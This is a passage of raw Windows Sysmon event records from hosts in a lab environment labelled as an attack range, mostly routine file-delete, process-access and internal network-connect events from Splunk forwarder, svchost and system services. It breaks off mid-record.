23542300x800000000000000045544Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:15.901{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\ProgramData\Foxit Software\Foxit PDF Reader\FoxitSensor\Sensor.db-journalMD5=A181440ED137226836F9DFD855E0BB02,SHA256=8CD47E9FAEF7D648FB9BEB59D4F43CAC0A7D1AA9CBC767756F23C3D1958DC117,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000045543Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:15.447{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=494162BE9949C72F48BEBEDAA9FE1FBE,SHA256=D3B24AF5D9024D870D84570C078461195113D9F503FABF707A725B85E1692455,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017890Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:15.374{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4CA0C61BC3437CF36111C98802A181C5,SHA256=1D2499EAA363A38F3A80B9F659EF8BD2CEE02A104EFB9DD337943794EA2F5D8F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045545Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:16.529{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=962104CB3BC6591A2175313F51744493,SHA256=BBA941BC40F286B75BF3DA07E1C2CD175F8ACC2141381C866DBB641049C2BA6A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017892Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:16.470{E5A8D418-DC43-63C7-1200-00000000B002}1012NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=ED569FFDE8D69C02B73AD040A3C97095,SHA256=DA43C0295A11CC851D3298FA7958481ED20F4D2512D219F3617F20ADE4453389,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000017891Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:16.454{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B9620BADDFD19A6C3D40D2C6F29DC598,SHA256=187459337F1EDCEDE2F57F86247524A6D4716B113BA239EE696040DB663CF9C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045546Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:17.631{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79CC8FA970BA989CAB996DBE11A5B6FB,SHA256=3B70398DB268E848427766421586299B6B8688602AB9A132325959E10AED86E7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000017908Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:17.595{E5A8D418-DC44-63C7-1600-00000000B002}12242840C:\Windows\System32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017907Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:17.588{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017906Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:17.588{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017905Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:17.588{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017904Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:17.588{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017903Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:17.588{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017902Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:17.588{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017901Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:17.588{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017900Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:17.588{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017899Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:17.588{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017898Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:17.588{E5A8D418-DC43-63C7-0500-00000000B002}416532C:\Windows\system32\csrss.exe{E5A8D418-E5A5-63C7-2602-00000000B002}2760C:\Windows\system32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000017897Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:17.588{E5A8D418-DC43-63C7-1100-00000000B002}9521484C:\Windows\system32\svchost.exe{E5A8D418-E5A5-63C7-2602-00000000B002}2760C:\Windows\system32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|c:\windows\system32\UBPM.dll+a731|c:\windows\system32\UBPM.dll+f954|c:\windows\system32\UBPM.dll+cd5c|c:\windows\system32\UBPM.dll+d325|c:\windows\system32\UBPM.dll+dc25|c:\windows\system32\UBPM.dll+e8fd|c:\windows\system32\UBPM.dll+e034|c:\windows\system32\UBPM.dll+11582|c:\windows\system32\EventAggregation.dll+3fae|c:\windows\system32\EventAggregation.dll+3ea1|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017896Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:17.588{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC43-63C7-1100-00000000B002}952C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017895Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:17.588{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC43-63C7-1100-00000000B002}952C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000017894Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:17.539{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6F4F58612E6B6286AA3D02C93A1E4ED,SHA256=3E2D9E8FB3418B47517EB6E7285972A5C6868D4565BF9FC6737F942FC7F425FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000017893Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:17.087{E5A8D418-DC44-63C7-1B00-00000000B002}1944NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0027b8f3633f25268\channels\health\respondent-20230118114719-038MD5=2BA10D7196373860DD67B47CDBC7ACF2,SHA256=36B87809E8BE9B960CE5E03B4CEC64D52EF7C46D9877F9C3402AB54869FC5CBA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000017911Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:18.693{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=560A80CCE79345E1CA99AE15F02DB64A,SHA256=1C5AD893EC959C8C7DB326F95BE77311FE34FE2928F7B9469403211911810C27,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000017910Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:18.608{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=421EB184350E7414D84F597119AADEB0,SHA256=F0A0BFD429B7D13A6D04FD3D0BBBF748B48B91775DD5099751B8EC0AD9B12DA8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045547Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:18.723{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C2F852124AB79CB185B2A5F6B1983C2,SHA256=2D7C11E1369B2CC9C5DAA93B6DF4FB6AAC1BAD6ADBB8698F317D2457A454435D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017909Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:18.088{E5A8D418-DC44-63C7-1B00-00000000B002}1944NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0027b8f3633f25268\channels\health\surveyor-20230118114717-039MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000017912Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:19.699{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F7C48B8B046230F020E368C7582596E,SHA256=AD557962663C52512D9DF64E045D20C3034D895524BE7DA825BD774A72232E23,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045549Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:19.814{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CAD18CB85A499A0F316910F8338DA925,SHA256=D4D904C4562C8DA50B15E05F9DAA03FA4BB6294616D5D7231C2C499A4514910C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000045548Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:17.543{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56429-false10.0.1.12-8000- 23542300x800000000000000045550Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:20.912{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92106035AD5E5A3B4728B8E579A35330,SHA256=0E58E2E7F43F5E6D2A1E7E4D66F0E8E937131F09E35E776A9FAD2EAB61BE8208,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017913Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:20.776{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=867355EF56AB25767D9265FFA4BB82B6,SHA256=E3B02CB6A665D18A3676641268C0E92A01BD302409269B3ED98614A167BDD020,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000017915Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:21.868{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C012E7341BE5BB5CA2DD8F259D0FD09,SHA256=206A124DDBACE4F31C40AC7012001A44F1C5CA4C272E156D6984750ED67ABC44,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000017914Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:18.990{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50158-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000045551Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:22.010{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1AAE35ABAA171217E10D53C164D26F9,SHA256=6337782127F81E9D679BC72508F5470192D11729BCAC2F66028F0703CBAEC70A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000017946Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:22.769{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCCE-63C7-EB00-00000000B002}3756C:\Program 